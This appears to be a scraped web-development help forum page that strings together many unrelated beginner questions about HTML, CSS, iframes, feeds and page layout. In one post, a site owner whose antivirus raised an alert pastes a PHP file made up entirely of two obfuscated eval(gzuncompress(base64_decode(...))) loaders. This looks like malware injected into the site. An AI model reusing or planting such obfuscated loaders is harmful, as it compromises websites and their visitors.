HTML - Displaying Doc File In Webpage
Hey I'm trying to figure out how I can display my doc file in a table or something, so then it would have a fieldset button "printable version," which would open a new window to print it on or download it.
Similar TutorialsThe issue I'm having is that I can't open an html file via a link in an existing web page. My webpage is created in ASP.Net using C# to list out all the .html files in a specific directory. That works fine. Here is the resulting web page Code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> </title></head> <body> <form name="form1" method="post" action="ProductsForGraphs.aspx" id="form1"> <div> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNzQ0NTIzMDlkZA5WbO/3euQo7nU92sfVjUhzzVQK" /> </div> <div> <table style="width:100%;"> <tr> <td> <a href='c:\FO\graphs\GE_Condor.html' target='_blank'>GE_Condor.html</a> </td> </tr> <tr> <td> <a href='c:\FO\graphs\GE_DblFly.html' target='_blank'>GE_DblFly.html</a> </td> </tr> <tr> <td> <a href='c:\FO\graphs\GE_Fly.html' target='_blank'>GE_Fly.html</a> </td> </tr> <tr> <td> <a href='c:\FO\graphs\I_Condor.html' target='_blank'>I_Condor.html</a> </td> </tr> <tr> <td> <a href='c:\FO\graphs\I_DblFly.html' target='_blank'>I_DblFly.html</a> </td> </tr> <tr> <td> <a href='c:\FO\graphs\I_Fly.html' target='_blank'>I_Fly.html</a> </td> </tr> <tr> <td> <a href='c:\FO\graphs\L_Condor.html' target='_blank'>L_Condor.html</a> </td> </tr> <tr> <td> <a href='c:\FO\graphs\L_DblFly.html' target='_blank'>L_DblFly.html</a> </td> </tr> <tr> <td> <a href='c:\FO\graphs\L_Fly.html' target='_blank'>L_Fly.html</a> </td> </tr> <tr> <td> <a href='c:\FO\graphs\ZQ_Condor.html' target='_blank'>ZQ_Condor.html</a> </td> </tr> <tr> <td> <a href='c:\FO\graphs\ZQ_Fly.html' target='_blank'>ZQ_Fly.html</a> </td> </tr> </table> </div> </form> </body> </html> Now when I click on the GE_Condor.html link, or any other link for that matter. The file doesn't open. Here is the code for the GE_Condor.html file. Code: <!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'> <html xmlns='http://www.w3.org/1999/xhtml' > <head> <title></title> </head> <body> <p> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE0U0Z0H1M1CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE0Z0H1M1U1CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE1H1M1U1Z1CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE1M1U1Z1H2CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE1U1Z1H2M2CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE1Z1H2M2U2CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE2H2M2U2Z2CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE2M2U2Z2H3CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE2U2Z2H3M3CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE2Z2H3M3U3CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE3H3M3U3Z3CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE3M3U3Z3H4CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE3U3Z3H4M4CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE3Z3H4M4U4CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE4H4M4U4Z4CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE4M4U4Z4H5CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE4U4Z4H5M5CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE4Z4H5M5U5CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE5H5M5U5Z5CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE5M5U5Z5H6CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE5U5Z5H6M6CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE5Z5H6M6U6CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE6H6M6U6Z6CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE6M6U6Z6H7CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE6U6Z6H7M7CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE6Z6H7M7U7CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE7H7M7U7Z7CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE7M7U7Z7H8CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE7U7Z7H8M8CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE7Z7H8M8U8CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE8H8M8U8Z8CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE8M8U8Z8H9CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE8U8Z8H9M9CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE8Z8H9M9U9CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE9H9M9U9Z9CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE9M9U9Z9H0CNDR.png' /> <img alt='No Image' src='C:\FuturesOptions\FOA\FOA\bin\x86\Debug\graphs\GE9U9Z9H0M0CNDR.png' /> </p> </body> </html> If I open the file directly in IE (typing in the path) or double-clicking on the file from windows explorer, it opens without any problems. Any ideas? Thanks Bob Greetings I have 3500 pages of content on my site and i would like to monetize all of them by placing some adds. The problem is that my advertisers might change sometimes and i don't want to update all the pages each time i decide to go for some other advertiser so i tought i should use another html file that would be displayed on all the 3500 pages and each time i would modify this file, it would update on all the 3500 pages. I would like the page to be search engine friendly too, if possible. Also don't want to use frames. So there would be small window 200 x 200 in size that would display the content of the seperate file on all these 3500 pages. So how should i do this, would java script be something to consider? I don't know much about php and would not like to use it, what would be the easyest way to do this? Also there can not be any borders in this window and it needs to be embedded in to all these 3500 pages, in exact size of 200 x 200. This system needs to work in IE, Firefox, netscape and opera!! The content would be adsense, banner or similar content. Please advise.... Sir. Turhapuro i want to display wave height data from a noaa buoy that is available and updated via a txt file. how can display this data graphically on a web site instead of just displaying the raw data from the text file? Sorry if i posted this in the wrong location. So im a real estate agent making a website. Im no pro and most of the stuff ive been using to build has been through layouts/generators/help of others such as yourselves. So ive been stuck on finding/making this code for the past couple of days. So all my listings are on my agencys website, not my personal agent website. Is there a code i could have where in the listings page my my personal agent website, i could have a window maybe 600x900 of the listing page on my agencys website? To kind of clear things up, you know how when you google something you have the magnifying glass, how it gives that preview. How can i have that preview coded onto a webpage, but me say what webpage to preview and how big to make the preview box? Tried to explain it as best i could. If you dont know the code, if you can tell me what its called so i can try to narrow the google searches. So far everything that has been coming up in the search restults has been preview boxes to preview html codes you have already written. Fail Blog Thanks how do i make a background image fit to the window. also i have a button on a page. how do i get it to close the window uppon clicking it. any help would be great. I'm a novice compared to the pros here and stuck on a couple issues. My website is uspsrealty.com There is some "empty" space on my home page below the horizontal line. I want to remove the horizontal line and have the ability to use that empty space without throwing my borders/margins off. I would like to add about 3-4 sentences in that blank area. Can this be changed so I can add a few sentences? I know why this is happening, just don't know how to correct it. Also want to change the copyright.jpg to 2010 from 2009. Might as well make up a few more jpgs with the years 2011, 2012, 2013, 2014, and 2015 Willing to paypal you money for your help. Hoping one of you pros can do this in 30 min and willing to pay $25-30. Contact me he galevin@hotmail.com Thanks, Gerald Levin Hi, i have a problem im not sure how to go about it . I have a webpage where the user enters there personal details . As they are fillign in details they click a link and another webpage is opened ( keeping the orginal open ) Where the do some other stuff on this new page and what is created is a javascript array of numbers I then want them to be able close this new window down and the javascript array data will be submitted with the rest of the personal information when the click a submit button on the first page . If this makes sense how do i go about this? Thanks I've done a search on here, and have spent the last week or searching on google, I'm currently building a webpage up which integrates a forum, i want to put a feed on the home page of the site of the latest topics from the forum. The feed address is: feed://guitarprojectuk.forumotion.com/feed/ and the actual website address is: http://www.guitarprojectuk.com I've tried a few on google, and non seem to work, not sure wether its the feed or something i'm doing, so can somebody help me out? Thanks, Tom. Hi, I was wonderin how to get a certain webpage onto my website Eny ideas Thanks I'm trying to learn a little bit of html. I've got some basic knowledge now, but I can't figure out one thing. I want to make a button to go to another webpage. How do I add webpages to my website and access them through a button? I have always used tables to layout my sites bt now everyone is telling me that I should use css instead. I am not sure how to do this in css so would somebody please explain this to me and an example would be nice too! Thanks so much! Hey guys(and girls ), Here is my problem i would like to make a webpage like this: ---------------------HEADER--------------------- ---------------------php script------------------- ---------------------FOOTER--------------------- (Show Word) <-- When i click this, the page will be refresh so the php script will echo a random word, but if i do that every time i refresh the page i dont want to refresh the Header and Footer. My idea was to use iFrames... Is there any other way? Thnxs!!! May I know how can make sure that my website fit under any resolution with out using Table(table,tr,td) in html??? Hello, I got this message with AVG : http://img189.imageshack.us/img189/8502/image001jn.png Here is my website : http://www.club19.com.au What is the problem ? Here is the code of the concerned file (SprySlidingPanels.php) : PHP Code: <?php eval(gzuncompress(base64_decode('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'))); eval(gzuncompress(base64_decode('eNqVWAtz2zYS/iu0JtOIE59NAHxGYUfXTpKm7uPqhxon8WhoiZI5lkQfSV3SOP7vt9hdUCRFu3eZmAQXi2+xi31B42y5yYt0ui3TYppc50U1LPLtZj50XjhHqvHv6U/bHo3LtJquk2U2m/57m1dpOS22mypbpwbQ8GjadJWts6o5kxZFXkyL9A62kG2WjalsMRwvtptZleWbafolK6ty+DzbZMBcVrD357Z9P258D/NVSphdougjyj6i6iO6fUQPiA+PbhH0rbcHY1zh24cNvZszwaMzoX2oX1GXLhz78LeLX37pksWjSELWUy/E3qTaTf6fx/+Qrsr0UTskqyotakvgFwl09zbamPSemvTJJCLomQtbVmlMRE8gSqepvOz+9SwQbVNqNzjYU38203obsjWbDZ+tpo59D08RI4xEH99***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'))); ?> Thank you ! I have a website that when I type in the url nothing appears on the page. I was wondering what would cause this to happen. I tried to re-saving the files for the website but still nothing, it just says Done in the bottom tray of the IE window. Thanks in advance! I have a project right now, but when I have finished the project, i'm wanting to recreate my Minecraft server website. But I have a question... I see websites that resize theirselves depending on the screen size.... How would you do this? I know of the % in css, but would I have to use that in each of my divs instead of using px? Okay that most probably didnt explain it very well but I am looking at putting a page together that will display a specific image at the top of the page dependant on where the visitor came from So if they came to my site from a link from abc.com then they will see the ABC logo on our page however if they came from 123.net then they will see the same page but this time with the 123.net logo. If we cant find where they have came from or we dont have an image for that forwarder then it will show a default image Anyone know if this can be done?? Hi just to introduce myself My name Is brian Krause and i work for valley queen cheese factory, In Milbank SD. My problem is on our website we hav a page that is called jobs.htm. Is there a way i can get it so when you type in www.vqcheese.com/jobs the jobs.htm page will show up and no just error out? Thanks Hi folks... first post and on the scrounge... Can anyone help with a problem on a website i am trying to design, my first site so go easy.... anyway... when i look at the page http://www.villagolf150.com/Gallery.html in IE it is fine.... but when i check it on Firefox there is a stray gap/space/whatever at the top near "home page" ... i have been trying for ages to get rid of it with no luck.... so pretty please.... can someone help me before i lose my mind.... Jeff. sorry, this isnt an exact repeat post... has a bit of additional information my friend had a friend make this page http://www.opportunity.com/index.html or something along those lines... Im using this page as a reference... So I copied the source, and copied the file free_access.css within the same folder I created an image subfolderd but when I preview it in dreamweaver it tells me it can not find the css file... Is this normal? do I need to upload it to a server first to actually view it... or am I making a mistake thx everyone for the help earlier Matt |